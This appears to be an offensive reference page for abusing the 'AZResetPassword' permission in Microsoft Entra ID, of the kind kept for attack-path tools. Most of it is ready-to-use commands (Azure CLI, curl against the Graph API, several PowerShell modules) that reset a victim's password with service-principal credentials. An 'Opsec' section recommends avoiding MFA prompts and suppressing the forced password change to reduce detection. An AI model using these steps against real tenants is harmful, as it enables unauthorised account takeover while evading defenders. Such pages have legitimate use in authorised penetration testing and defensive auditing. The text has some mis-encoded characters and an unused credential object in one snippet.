AZResetPassword
The source principal can reset the password of the target Entra ID user account.
Applies to: User / ServicePrincipal / Group β AZUser
Linux Abuse
Azure CLI
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad user update --id <target-user-upn> \
--password '<new-password>' \
--force-change-password-next-sign-in false
Graph API (curl)
# Get token first
TOKEN=$(curl -s -X POST \
"https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
-d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
| jq -r '.access_token')
curl -s -X PATCH "https://graph.microsoft.com/v1.0/users/<target-user-id>" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"passwordProfile": {
"password": "<new-password>",
"forceChangePasswordNextSignIn": false
}
}'
Windows Abuse
Microsoft.Graph PowerShell
Connect-MgGraph -AccessToken <access-token>
Update-MgUser -UserId <target-user-id> `
-PasswordProfile @{
Password = "<new-password>"
ForceChangePasswordNextSignIn = $false
}
PowerZure
Set-AzureUserPassword -Username <target-user-upn> -Password '<new-password>'
Az PowerShell (interactive)
Connect-AzAccount
$cred = [Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential]@{
Password = '<new-password>'
}
# Use portal or Graph module for password reset β AzureAD module:
Set-AzureADUserPassword -ObjectId <target-user-id> -Password (ConvertTo-SecureString '<new-password>' -AsPlainText -Force)
Opsec
- Every password reset is logged in Entra ID audit logs with actor UPN, target UPN, timestamp.
- Prefer service principal auth over interactive login to avoid MFA prompts.
- Setting
forceChangePasswordNextSignIn = falseavoids forcing the victim to change the password, reducing detection from helpdesk tickets.